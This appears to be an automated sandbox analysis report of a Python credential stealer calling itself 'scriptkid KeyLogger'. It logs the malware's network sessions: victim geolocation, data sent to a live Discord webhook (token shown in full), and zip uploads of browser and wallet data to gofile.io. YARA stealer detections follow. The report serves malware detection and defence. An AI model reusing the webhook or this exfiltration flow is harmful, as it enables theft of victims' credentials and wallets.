2024-11-15 09:46:15 UTC | 194 | IN | Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49741 | 159.89.102.253 | 443 | 8168 | C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-15 09:46:16 UTC | 127 | OUT | GET /json/ HTTP/1.1
                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                        Host: geolocation-db.com
                                                                                                                                                                                                                                        User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                        Connection: close
2024-11-15 09:46:16 UTC | 206 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:16 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
2024-11-15 09:46:16 UTC | 176 | IN | Data Ascii: a5{"country_code":"US","country_name":"United States","city":"Dallas","postal":"75270","latitude":32.7787,"longitude":-96.8217,"IPv4":"173.254.250.89","state":"Texas"}0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49751 | 162.159.138.232 | 443 | 8168 | C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-15 09:46:17 UTC | 275 | OUT | POST /api/webhooks/1306736758784004148/QAtKBhEgOSzIDzz8vpEyO3M9xeb24YVrDv87fdm717EJzQmVQQtRdLnTFwu9gwloToi1 HTTP/1.1
                                                                                                                                                                                                                                        Host: discord.com
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Python/3.11 aiohttp/3.8.4
                                                                                                                                                                                                                                        Content-Length: 62
                                                                                                                                                                                                                                        Content-Type: application/json
2024-11-15 09:46:17 UTC | 62 | OUT | Data Ascii: {"username": "scriptkid | @sxriptkid", "content": "@everyone"}
2024-11-15 09:46:17 UTC | 1362 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:17 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: __dcfduid=7607725ea33611ef9e80caae762da552; Expires=Wed, 14-Nov-2029 09:46:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                        x-ratelimit-limit: 5
                                                                                                                                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                                                                                                                                        x-ratelimit-reset: 1731663978
                                                                                                                                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eRacWiKZrU5dmmSMB95bjwczf33fIqeOdM6nHZMmIEb3%2B%2Bw6OlCGx%2BAo%2FdJSbnzz%2BQ%2FZme1Di87ef5dAvk3wKhlpA4I2SDmZjHYtsf%2BGOTSF2pXvo4jSm8EqJZHG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                        Set-Cookie: __sdcfduid=7607725ea33611ef9e80caae762da552fbcc4f524d3c7c3fdeb79e124481544d765ce6baf5acf6653995f1588ff4399a; Expires=Wed, 14-Nov-2029 09:46:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                        Set-Cookie: __cfruid=7970ba58701abeed2651d16be2bf566e0fb41856-1731663977; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-11-15 09:46:17 UTC | 211 | IN | Data Ascii: Set-Cookie: _cfuvid=XTAuqn0.Rr9N36xc86wfNh5981r7ugeZD4UhPI426kk-1731663977571-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8e2e50331ee447af-DFW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49757 | 162.159.136.232 | 443 | 8168 | C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-15 09:46:18 UTC | 584 | OUT | POST /api/webhooks/1306736758784004148/QAtKBhEgOSzIDzz8vpEyO3M9xeb24YVrDv87fdm717EJzQmVQQtRdLnTFwu9gwloToi1 HTTP/1.1
                                                                                                                                                                                                                                        Host: discord.com
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Python/3.11 aiohttp/3.8.4
                                                                                                                                                                                                                                        Cookie: __cfruid=7970ba58701abeed2651d16be2bf566e0fb41856-1731663977; __dcfduid=7607725ea33611ef9e80caae762da552; __sdcfduid=7607725ea33611ef9e80caae762da552fbcc4f524d3c7c3fdeb79e124481544d765ce6baf5acf6653995f1588ff4399a; _cfuvid=XTAuqn0.Rr9N36xc86wfNh5981r7ugeZD4UhPI426kk-1731663977571-0.0.1.1-604800000
                                                                                                                                                                                                                                        Content-Length: 686
                                                                                                                                                                                                                                        Content-Type: application/json
2024-11-15 09:46:18 UTC | 686 | OUT | Data Ascii: {"username": "scriptkid | @sxriptkid", "embeds": [{"title": "raped by @sxriptkid", "description": "> **scriptkid has injected the following victim:**", "url": "", "color": 65535, "footer": {"text": "scriptkid KeyLogger \u250b @sxriptkid"}, "thumbnail": {"
2024-11-15 09:46:18 UTC | 905 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:18 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                        x-ratelimit-limit: 5
                                                                                                                                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                                                                                                                                        x-ratelimit-reset: 1731663979
                                                                                                                                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XUus5QDG3%2BQgAobFBfTV94APBSMZmKG%2FW5GRE%2BUDCJ4nVjkrzCTvhBqJpbm%2FqUee9nn9rYvI%2FPwl8UvgQDxBf85oGzj12t8NMwMsh0nJRIuIrN%2FNvF%2BZ1Vj0r1xV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8e2e5038fa1d6c56-DFW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49901 | 162.159.138.232 | 443 | 8168 | C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-15 09:46:42 UTC | 277 | OUT | POST /api/webhooks/1306736758784004148/QAtKBhEgOSzIDzz8vpEyO3M9xeb24YVrDv87fdm717EJzQmVQQtRdLnTFwu9gwloToi1 HTTP/1.1
                                                                                                                                                                                                                                        Host: discord.com
                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Python/3.11 aiohttp/3.8.4
                                                                                                                                                                                                                                        Content-Length: 1183
2024-11-15 09:46:42 UTC | 1183 | OUT | Data Ascii: {"username": "scriptkid", "embeds": [{"title": "scriptkid - Summary", "description": "> **Here's a summary of everything that was stolen:**", "url": "", "color": 16753920, "footer": {"text": "scriptkid KeyLogger \u250b @sxriptkid"}, "thumbnail": {"url": "
2024-11-15 09:46:42 UTC | 1358 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:42 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: __dcfduid=851e9a9ca33611ef8eb5cabe1fae9a88; Expires=Wed, 14-Nov-2029 09:46:42 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                        x-ratelimit-limit: 5
                                                                                                                                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                                                                                                                                        x-ratelimit-reset: 1731664004
                                                                                                                                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fpyc3xuSAnhci0rxpeHMZAFX5Fa4ib0NaRDtJyv07t%2BfygE0hR5mCRuJswpx9qLNvhXremGqQJ8CbS%2FpuT6rOT1BVaIXNb4MbZyjoIZ7MjfKRHrHegmj%2Bfn9uwa%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                        Set-Cookie: __sdcfduid=851e9a9ca33611ef8eb5cabe1fae9a88e92a3a342f5be09cef396874936a30b0da90de3f55da1d6c0a6e433590b77cc5; Expires=Wed, 14-Nov-2029 09:46:42 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                        Set-Cookie: __cfruid=6ab1c74a1bb8acebe17506b080c5367f83ffe629-1731664002; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-11-15 09:46:42 UTC | 211 | IN | Data Ascii:
Set-Cookie: _cfuvid=zYsNjtMfMV4DeaMqa_Ek_F8xHsLwXwyfTISh7kuPvJI-1731664002889-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8e2e50d14d926b5b-DFW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49907 | 162.159.136.232 | 443 | 8168 | C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-15 09:46:43 UTC | 633 | OUT | POST /api/webhooks/1306736758784004148/QAtKBhEgOSzIDzz8vpEyO3M9xeb24YVrDv87fdm717EJzQmVQQtRdLnTFwu9gwloToi1 HTTP/1.1
                                                                                                                                                                                                                                        Host: discord.com
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Python/3.11 aiohttp/3.8.4
                                                                                                                                                                                                                                        Cookie: __cfruid=6ab1c74a1bb8acebe17506b080c5367f83ffe629-1731664002; __dcfduid=851e9a9ca33611ef8eb5cabe1fae9a88; __sdcfduid=851e9a9ca33611ef8eb5cabe1fae9a88e92a3a342f5be09cef396874936a30b0da90de3f55da1d6c0a6e433590b77cc5; _cfuvid=zYsNjtMfMV4DeaMqa_Ek_F8xHsLwXwyfTISh7kuPvJI-1731664002889-0.0.1.1-604800000
                                                                                                                                                                                                                                        Content-Length: 452584
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=cf1f719bb312469bb34301d37190185a
2024-11-15 09:46:43 UTC | 36 | OUT | Data Ascii: --cf1f719bb312469bb34301d37190185a
2024-11-15 09:46:43 UTC | 164 | OUT | Data Ascii:
Content-Type: application/octet-stream
Content-Disposition: form-data; name="file"; filename="88AE2742-2B8C-0221-A586-225B8451ACF0.zip"
Content-Length: 452344
2024-11-15 09:46:43 UTC | 16384 | OUT | Data Ascii: PK%oYBrowsers/PK%oYWallets/PK%oYTDisplay (1).pnglgTS]4*5@0KBQ(A:"TM@@#EDJs337dw:g86z!`<E)Zau|qK
                                                                                                                                                                                                                                        Data Ascii: DXpxJT[:Cb0g^+DZZqSeSKPx@>8Api0Q$8VsW0pUrP1_^DtNVMTNTO-|\KY,'Ad)y#`mvucezDM\:q{*w,x{j|FvTpp
                                                                                                                                                                                                                                        2024-11-15 09:46:43 UTC16384OUTData Raw: 96 47 ef 58 51 96 df 20 13 22 48 40 71 64 10 25 42 f2 99 1f 57 3d 6d d1 d5 74 af 6f 8c 6a 02 9b fa b1 10 30 5b ba 9b fc f7 8e b5 0a 72 71 cc 19 8a ce 86 93 b9 48 e9 da 88 36 a3 20 72 1f 29 c6 c9 bf 5f 1a 46 5d 83 e8 0c f7 0a b3 89 dc b0 52 55 a8 47 44 23 c1 ad fd 6f 5c fd 78 b1 ce 2a a9 9e b1 78 26 c3 65 7c 41 7a f8 f0 7a 04 99 ab b4 a2 4f 68 7d d9 27 80 78 1e ff 3b 8c b0 c3 dc 27 80 a3 40 a1 36 da c1 14 7f b8 ad f6 b6 6e 68 2e d8 c0 69 cb 68 e9 22 7e c2 e8 e1 7a db 6e 3a 7e 4c c2 7a e1 7e 69 38 fb b7 be f5 45 84 d3 0d 37 27 c3 4c e3 52 23 f3 fc 8d a3 1f c0 cb db c4 56 04 32 87 91 ce bb 77 5c 72 6e b2 7e b5 1f df e4 a1 c7 c0 bc 5f 8d 83 44 46 a4 4e 39 6c 9d a8 dc 5e 9b ca 4f 29 c5 bd fe b2 0a 1b 1d 24 52 1f 32 84 77 47 31 9a e4 db b5 b9 68 e6 86 df 3e 53
                                                                                                                                                                                                                                        Data Ascii: GXQ "H@qd%BW=mtoj0[rqH6 r)_F]RUGD#o\x*x&e|AzzOh}'x;'@6nh.ih"~zn:~Lz~i8E7'LR#V2w\rn~_DFN9l^O)$R2wG1h>S
                                                                                                                                                                                                                                        2024-11-15 09:46:43 UTC16384OUTData Raw: 40 b2 f6 71 7b 16 32 2e 80 17 75 7b 1a d0 3f 27 29 6c 6f b5 93 4a 19 6a 00 8c f2 b7 3f e9 c4 d5 5f e4 42 3f 71 de 91 39 21 6c b6 92 19 5a f2 c5 7d 3b 27 ea b0 c5 ad 9b a8 8d 53 c7 e6 d4 58 48 71 56 4c 57 0c e0 eb c1 e4 7a a9 78 80 f6 14 19 62 01 aa 50 fa 7f e2 24 b1 9b 29 b8 cb 34 f8 1c 70 35 17 c0 e9 90 d3 e0 7e 4f 00 a0 73 36 ca 2c bb 82 2c 56 c5 80 5d c3 58 78 0e a0 87 39 de b7 ea 30 b5 1e 4a 2f 7e 03 60 c2 38 c9 be 2c c4 b1 1a 66 d9 24 6d 3c 19 cc 31 9d 4f 83 ba dc a5 ac 76 e1 47 5f 93 8d 2e 2f 59 60 ff 49 ea 81 6d 7a 3d d5 97 b5 8d 51 f6 95 e7 aa b6 e3 ac 25 58 33 50 fc a6 21 67 9e 95 00 40 90 4c 33 59 78 42 ea 20 25 ba 09 b0 bc c9 8e b7 15 d5 c2 78 80 b7 06 3a b2 47 0c cc 9d e5 cf 19 ec 49 24 87 df 78 3d 6b 0f 64 37 5f 65 d2 82 c2 6a 78 d6 7b 4d 70
                                                                                                                                                                                                                                        Data Ascii: @q{2.u{?')loJj?_B?q9!lZ};'SXHqVLWzxbP$)4p5~Os6,,V]Xx90J/~`8,f$m<1OvG_./Y`Imz=Q%X3P!g@L3YxB %x:GI$x=kd7_ejx{Mp
2024-11-15 09:46:44 UTC  934  IN  HTTP/1.1 200 OK
Date: Fri, 15 Nov 2024 09:46:44 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1731664005
x-ratelimit-reset-after: 1
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9lCGYLfOEfxsUw8m8vloy4LazLNa4gJ2nKglbXOnA35OIH82t9phx1Rw8XVFg95I%2Fvg9Csbo%2BN3GRN6S0zED%2BL6NZQyDe1hJb1fyeupzB8D7WLiw%2F7FymcIgnjf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Server: cloudflare
CF-RAY: 8e2e50d6beafb787-DFW


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
6  192.168.2.10  49927  45.112.123.126  443  8168  C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
Timestamp  Bytes transferred  Direction  Data
2024-11-15 09:46:46 UTC  132  OUT  GET /getServer HTTP/1.1
Host: api.gofile.io
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.11 aiohttp/3.8.4
2024-11-15 09:46:47 UTC  1113  IN  HTTP/1.1 404 Not Found
Server: nginx/1.27.1
Date: Fri, 15 Nov 2024 09:46:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
Access-Control-Allow-Credentials: true
Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 0
ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
2024-11-15 09:46:47 UTC  14  IN  Data Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
Data Ascii: error-notFound


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
7  192.168.2.10  49935  45.112.123.227  443  8168  C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
Timestamp  Bytes transferred  Direction  Data
2024-11-15 09:46:48 UTC  238  OUT  POST /uploadFile HTTP/1.1
Host: store1.gofile.io
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.11 aiohttp/3.8.4
Content-Length: 56125
Content-Type: multipart/form-data; boundary=4053daa8447c4cdaa2c54e41d948e50f
2024-11-15 09:46:48 UTC  36  OUT  Data Raw: 2d 2d 34 30 35 33 64 61 61 38 34 34 37 63 34 63 64 61 61 32 63 35 34 65 34 31 64 39 34 38 65 35 30 66 0d 0a
Data Ascii: --4053daa8447c4cdaa2c54e41d948e50f
2024-11-15 09:46:48 UTC  145  OUT  Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 7a 69 70 2d 63 6f 6d 70 72 65 73 73 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 73 63 72 69 70 74 6b 69 64 46 49 4c 45 53 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 35 39 30 34 0d 0a 0d 0a
Data Ascii: Content-Type: application/x-zip-compressedContent-Disposition: form-data; name="file"; filename="scriptkidFILES.zip"Content-Length: 55904
                                                                                                                                                                                                                                        2024-11-15 09:46:48 UTC2OUTData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2024-11-15 09:46:48 UTC38OUTData Raw: 2d 2d 34 30 35 33 64 61 61 38 34 34 37 63 34 63 64 61 61 32 63 35 34 65 34 31 64 39 34 38 65 35 30 66 2d 2d 0d 0a
                                                                                                                                                                                                                                        Data Ascii: --4053daa8447c4cdaa2c54e41d948e50f--
2024-11-15 09:46:50 UTC | 449 | IN | HTTP/1.1 200 OK
Server: nginx/1.27.1
Date: Fri, 15 Nov 2024 09:46:50 GMT
Content-Type: application/json
Content-Length: 434
Connection: close
Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2024-11-15 09:46:50 UTC | 434 | IN | Data Ascii: {"data":{"createTime":1731664010,"downloadPage":"https://gofile.io/d/vIIEjO","guestToken":"T1SPj8AYYN3B6PScWR8WUFeH0JuP3kRY","id":"d5b8836f-c6b0-446f-99bf-a574df94ffbd","md5":"f0974426e719c0c0dd722bdb8b7a6138","mimetype":"application/zip","modTime":173166


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49953 | 162.159.138.232 | 443 | 8168 | C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-15 09:46:51 UTC | 276 | OUT | POST /api/webhooks/1306736758784004148/QAtKBhEgOSzIDzz8vpEyO3M9xeb24YVrDv87fdm717EJzQmVQQtRdLnTFwu9gwloToi1 HTTP/1.1
Host: discord.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.11 aiohttp/3.8.4
Content-Length: 435
Content-Type: application/json
2024-11-15 09:46:51 UTC | 435 | OUT | Data Ascii: {"username": "scriptkid", "embeds": [{"title": "scriptkid - Stolen Files", "description": "> **Here's every single file from the victim's PC:**", "url": "", "color": 16753920, "footer": {"text": "scriptkid KeyLogger \u250b @sxriptkid"}, "thumbnail": {"url
2024-11-15 09:46:51 UTC | 1352 | IN | HTTP/1.1 204 No Content
Date: Fri, 15 Nov 2024 09:46:51 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: __dcfduid=8a3af598a33611ef8e3d0e90f7c9821b; Expires=Wed, 14-Nov-2029 09:46:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1731664012
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kl7Bqf3ql5uVHoaGivCV758ArKX5cAv2JmvJ3zcT%2BqHgvRNNnvugEbFnrQgH1IO9fl6QOx8toDvuPFnpFVCLT0KnHUiWEkN9P2igV2SRgeXBQQ%2BPK02LPX28WslS"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=8a3af598a33611ef8e3d0e90f7c9821bce6c0117b5de4c54f987a74f36362fc75a95fcd9b7c6acc26bf4c95a9ce7e415; Expires=Wed, 14-Nov-2029 09:46:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=5285e216218abd708035dbdafb13265a53a0f2b9-1731664011; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-11-15 09:46:51 UTC | 211 | IN | Data Ascii: Set-Cookie: _cfuvid=lgIPfA_tgYFtTbxMUWGA0zK2SDGuOQdvIKsNYUv5ANo-1731664011462-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8e2e5106fafd6b48-DFW


                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:04:46:07
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\RuntimeusererVers.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff677eb0000
                                                                                                                                                                                                                                        File size:13'747'712 bytes
                                                                                                                                                                                                                                        MD5 hash:4FD34971F2551E33806360BA5EE86E5E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:04:46:07
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                        Start time:04:46:10
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\RuntimeusererVers.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff7e14a0000
                                                                                                                                                                                                                                        File size:24'189'952 bytes
                                                                                                                                                                                                                                        MD5 hash:D71750B08D81D33E6BEAD1CEB707BC4F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
